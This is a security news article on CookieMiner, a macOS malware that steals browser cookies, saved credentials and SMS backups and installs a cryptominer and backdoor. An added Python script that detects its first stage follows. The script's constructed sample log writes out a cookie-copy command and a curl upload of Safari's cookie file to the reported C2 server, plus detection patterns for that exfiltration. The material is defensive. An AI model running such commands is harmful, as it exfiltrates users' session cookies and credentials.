Mac and Chrome info stealer and cryptomining malware in the wild

News by Doug Olenick

Cyber-criminals are using a new malware targeting Macs and the Chrome browser designed to steal all the information necessary to break into cryptocurrency exchanges and their victim's digital wallets.


This malware, an offshoot of OSX.DarthMiner, has a wide range of abilities, Palo Alto Networks' Unit 42 reported. These include stealing browser cookies associated with cryptocurrency exchanges and digital wallet services; usernames, passwords and credit card information saved in Chrome; and iPhone text messages from iTunes backups on the tethered Mac.

"By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites," the Unit 42 report said, adding that much of this is accomplished by abusing the legitimate extraction and decryption capabilities built into Chrome by the Google Chromium project.

If all of these pieces come together, the attacker should be able to log in to the target's exchange and wallet accounts with full access to each.

The malware then follows "in for a penny, in for a pound" reasoning and installs cryptomining software on the victim's device. Rather oddly, the mining component looks like a run-of-the-mill build of XMRig that would mine Monero, but it is in fact a coinminer for Koto, a Japanese-centric cryptocurrency. For good measure, it also installs the EmPyre backdoor to maintain persistence.

"The CookieMiner attack begins with a shell script targeting MacOS. It copies the Safari browser's cookies to a folder, and uploads it to a remote server (46.226.108[.]171:8000). The server hosts the service 'curldrop' (https://github[.]com/kennell/curldrop), which allows users to upload files with curl," the report said.

The stolen information is uploaded upon command to the command and control server.
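The first stage described above (a script copies the Safari cookie store to a folder and uploads it with curl to the reported server) leaves two observable traces on the endpoint. The following detector is an added example, not code from the article or the Unit 42 report: it scans constructed macOS process-execution log lines for a copy of Safari's cookie file and for a curl upload to the reported IP and port. The log format (timestamp, user, executable, argument string) is a constructed simplification, and the Safari cookie file name is a well-known macOS path that the article itself does not state.

```python
"""
Added example (not from the SC Media article or the Unit 42 report): flag the
two CookieMiner first-stage behaviours the article describes, a copy of the
Safari cookie store and a curl upload to 46.226.108[.]171:8000, in process
execution logs. The log format below is a constructed, simplified one; adapt
parse_line() to whatever your EDR or unified-log export actually emits.
"""
import re

# Indicator reported in the article (written defanged there; normalised here).
C2_HOST = "46.226.108.171"
C2_PORT = "8000"

# Safari's cookie store file name on macOS (well-known path, not in the article).
SAFARI_COOKIE_FILE = "Cookies.binarycookies"

# Constructed sample log lines: "<timestamp> <user> <exe> <args>".
SAMPLE_LOG = """\
2019-01-31T10:02:11Z alice /bin/cp cp -R /Users/alice/Library/Cookies/Cookies.binarycookies /tmp/.cache/
2019-01-31T10:02:12Z alice /usr/bin/curl curl -F file=@/tmp/.cache/Cookies.binarycookies http://46.226.108.171:8000/
2019-01-31T10:05:40Z alice /usr/bin/curl curl -sS https://example.com/update.json -o /tmp/update.json
2019-01-31T10:06:01Z bob /bin/cp cp notes.txt backup/notes.txt
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<user>\S+)\s+(?P<exe>\S+)\s+(?P<args>.*)$")

# Upload-style curl switches that a curldrop server would accept.
UPLOAD_SWITCH_RE = re.compile(r"(^|\s)(-F|-T|--upload-file|--data-binary)(\s|=)")


def parse_line(line):
    """Split one constructed log line into its fields; None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(event):
    """Return the list of alert tags for one parsed event (empty if nothing matched)."""
    tags = []
    args = event["args"]
    exe = event["exe"].rsplit("/", 1)[-1]

    # Trace 1: a file-copy tool touching the Safari cookie store.
    if SAFARI_COOKIE_FILE in args and exe in ("cp", "ditto", "rsync"):
        tags.append("safari_cookie_copy")

    # Trace 2: curl talking to the reported server, or uploading the cookie file.
    if exe == "curl":
        if f"{C2_HOST}:{C2_PORT}" in args:
            tags.append("c2_ioc_match")
        if UPLOAD_SWITCH_RE.search(args) and SAFARI_COOKIE_FILE in args:
            tags.append("cookie_exfil_via_curl")
    return tags


def scan(log_text):
    """Return (timestamp, user, tags) for every line that raised at least one tag."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        tags = classify(event)
        if tags:
            alerts.append((event["ts"], event["user"], tags))
    return alerts


if __name__ == "__main__":
    for ts, user, tags in scan(SAMPLE_LOG):
        print(ts, user, ",".join(tags))
```

The IP match is the brittle part (the report's server can change at any time); the two behavioural rules, a copy of the cookie store followed by a curl upload of that file, are what to keep when tuning this against real telemetry.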

This article was originally published on SC Media US.
